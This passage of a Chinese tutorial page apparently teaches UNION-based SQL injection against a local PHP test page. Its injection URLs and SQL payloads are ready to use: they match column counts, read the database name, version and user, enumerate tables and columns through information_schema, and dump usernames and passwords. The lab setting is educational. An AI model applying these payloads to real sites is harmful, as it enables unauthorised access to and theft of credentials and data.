<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span><span style="color:#099">1</span>,<span style="color:#099">2</span>,<span style="color:#099">3</span>,<span style="color:#099">4</span>,<span style="color:#099">5</span>
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121093807886.png">
            <img class="mx-auto" alt="image-20210121093807886" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121093807886.png" />
        </a>
    </p>
<blockquote>
<p>为了防止错误,可以设计一个不会出错的union语句:<code>union all select null,null,null...</code></p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>...
 
 http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=-</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>
 
 <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=-</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>
</code></pre></td></tr></table>
</div>
</div><p><strong>null不会导致任何类型转换错误，因为它只是null</strong></p>
<p>id=-1 : 只显示union后面的数据</p>
</blockquote>
<p>注： 联合查询后在跟查询语句格式为：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- union select 显示1,(select group_concat(username) from user),显示3,
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> (<span style="color:#000;font-weight:bold">select</span> group_concat(id,username) <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span>),<span style="color:#099">2</span>,<span style="color:#099">3</span>,<span style="color:#099">4</span>,<span style="color:#099">5</span>;
</code></pre></td></tr></table>
</div>
</div><div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span>(<span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span>group_concat(id,username)<span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">from</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">user</span>),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121151816023.png">
            <img class="mx-auto" alt="image-20210121151816023" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121151816023.png" />
        </a>
    </p>
<h4 id="3替换的列在页面上查看数据">3.替换的列，在页面上查看数据。</h4>
<p>查看数据可用信息，需要使用数据库函数，在这列出常用mysql函数，和使用方法</p>
<ul>
<li><strong><code>database（）</code> 查看当前数据库</strong></li>
<li><code>user()</code> 查看当前用户名</li>
<li><code>version()</code> 获取当前版本</li>
<li><code>@@version_compile_os</code> 获取当前操作系统</li>
<li><code>@@basedir</code> 获取数据库安装路径</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">user</span>(),<span style="color:#000;font-weight:bold">database</span>(),<span style="color:#000;font-weight:bold">version</span>(),<span style="color:#000;font-weight:bold">@@</span>version_compile_os,<span style="color:#000;font-weight:bold">null</span>

<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">user</span>(),<span style="color:#000;font-weight:bold">database</span>(),<span style="color:#000;font-weight:bold">version</span>(),<span style="color:#000;font-weight:bold">@@</span>version_compile_os,<span style="color:#000;font-weight:bold">null</span>
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101311139.png">
            <img class="mx-auto" alt="image-20210121101311139" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101311139.png" />
        </a>
    </p>
<h3 id="第三步猜解用户名和密码">第三步：猜解用户名和密码</h3>
<blockquote>
<p>猜解用户名和密码。数据库中的表和字段命名一般都是有规律的。通过构造特殊SQL语句在数据库中依次猜解出表名、字段名、字段数、用户名和密码。</p>
</blockquote>
<h4 id="1获取数据库">1.获取数据库</h4>
<p>由上步 <code>union select database()</code> 获取到数据库名</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">database</span>(),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>

<span style="color:#998;font-style:italic">-- 执行SQL查询语句是：
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">database</span>(),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>
</code></pre></td></tr></table>
</div>
</div><h4 id="image-20210121101836852httpsgiteecomgitmatriximagesrawmasterimgimage-20210121101836852png">
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101836852.png">
            <img class="mx-auto" alt="image-20210121101836852" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121101836852.png" />
        </a>
    </h4>
<h4 id="2知道数据库后获取数据表">2.知道数据库后获取数据表</h4>
<p>使用information_schema 库中的 tables表的tables_name 获取上一步数据库中的表名：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">6
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- sql 语句原型
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> (<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">table_name</span> <span style="color:#000;font-weight:bold">from</span> information_schema.tables <span style="color:#000;font-weight:bold">where</span> table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#000;font-weight:bold">database</span>()),<span style="color:#099">2</span>,<span style="color:#099">3</span>,<span style="color:#099">4</span>,<span style="color:#099">5</span>;
<span style="color:#998;font-style:italic">-- 或者 直接用当前数据库
</span><span style="color:#998;font-style:italic"></span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> (<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">table_name</span> <span style="color:#000;font-weight:bold">from</span> information_schema.tables <span style="color:#000;font-weight:bold">where</span> table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;test_php&#39;</span>),<span style="color:#099">2</span>,<span style="color:#099">3</span>,<span style="color:#099">4</span>,<span style="color:#099">5</span>;
 <span style="color:#998;font-style:italic">-- 或者 使用group_concat() 聚合显示
</span><span style="color:#998;font-style:italic"></span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> (<span style="color:#000;font-weight:bold">select</span> group_concat(<span style="color:#000;font-weight:bold">table_name</span>) <span style="color:#000;font-weight:bold">from</span> information_schema.tables <span style="color:#000;font-weight:bold">where</span> table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;test_php&#39;</span>),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121150511113.png">
            <img class="mx-auto" alt="image-20210121150511113" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121150511113.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span>(<span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">%</span><span style="color:#099">20</span><span style="color:#000;font-weight:bold">table_name</span><span style="color:#000;font-weight:bold">%</span><span style="color:#099">20</span><span style="color:#000;font-weight:bold">from</span><span style="color:#000;font-weight:bold">%</span><span style="color:#099">20</span>information_schema.tables<span style="color:#000;font-weight:bold">%</span><span style="color:#099">20</span><span style="color:#000;font-weight:bold">where</span><span style="color:#000;font-weight:bold">%</span><span style="color:#099">20</span>table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#000;font-weight:bold">database</span>()),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121152133410.png">
            <img class="mx-auto" alt="image-20210121152133410" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121152133410.png" />
        </a>
    </p>
<h4 id="3知道数据表后获取表字段">3.知道数据表后获取表字段</h4>
<p>在知道数据库名和数据表名后，获取字段名用 <code>information_schema</code>数据库中<code>columns</code>中的<code>column_nmame</code> 字段</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> (<span style="color:#000;font-weight:bold">select</span> group_concat(<span style="color:#000;font-weight:bold">column_name</span>) <span style="color:#000;font-weight:bold">from</span> information_schema.columns <span style="color:#000;font-weight:bold">where</span> table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;test_php&#39;</span> <span style="color:#000;font-weight:bold">and</span> <span style="color:#000;font-weight:bold">table_name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;user&#39;</span>),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121153544963.png">
            <img class="mx-auto" alt="image-20210121153544963" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121153544963.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span>(<span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span>group_concat(<span style="color:#000;font-weight:bold">column_name</span>)<span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">from</span><span style="color:#000;font-weight:bold">+</span>information_schema.columns<span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">where</span><span style="color:#000;font-weight:bold">+</span>table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#000;font-weight:bold">database</span>()<span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">and</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">table_name</span><span style="color:#000;font-weight:bold">=%</span><span style="color:#099">27</span><span style="color:#000;font-weight:bold">user</span><span style="color:#000;font-weight:bold">%</span><span style="color:#099">27</span>),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121160540142.png">
            <img class="mx-auto" alt="image-20210121160540142" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121160540142.png" />
        </a>
    </p>
<h3 id="4获取数据">4，获取数据</h3>
<p>当知道数据库名，表名，表中字段名后就可以直接用查询语句获取数据了</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> username, password <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span>;
<span style="color:#000;font-weight:bold">select</span> group_concat(username,password) <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span>;

 <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">all</span> <span style="color:#000;font-weight:bold">select</span> (<span style="color:#000;font-weight:bold">select</span> group_concat(username,password) <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span>),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155157457.png">
            <img class="mx-auto" alt="image-20210121155157457" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155157457.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">union</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">all</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span>(<span style="color:#000;font-weight:bold">select</span><span style="color:#000;font-weight:bold">+</span>group_concat(username,password)<span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">from</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">user</span>),<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>,<span style="color:#000;font-weight:bold">null</span>;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155424582.png">
            <img class="mx-auto" alt="image-20210121155424582" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121155424582.png" />
        </a>
    </p>
<h2 id="mysql-前置知识">mysql 前置知识</h2>
<h3 id="information_schema-数据库">information_schema 数据库</h3>
<blockquote>
<p><code>information_schema</code>数据库 是mysql 5.0 以上版本自带的一个数据库，这数据库存储着整个数据库名，数据库中的表名，表中的列名，数据类型，访问权限等。相当于整个数据库的目录</p>
</blockquote>
<p><strong>information_schema 中重点关注的有三张表：</strong></p>
<ul>
<li>
<h3 id="schemata-schemata-表中提供了当前数据中所有数据库的信息"><code>schemata</code>: SCHEMATA 表中提供了当前数据中所有<strong>数据库</strong>的信息；</h3>
<ul>
<li>
<h4 id="schema_name-schema_name-字段名保存所有数据库名"><code>schema_name</code> SCHEMA_NAME 字段名保存所有<strong>数据库名</strong>；</h4>
</li>
</ul>
</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
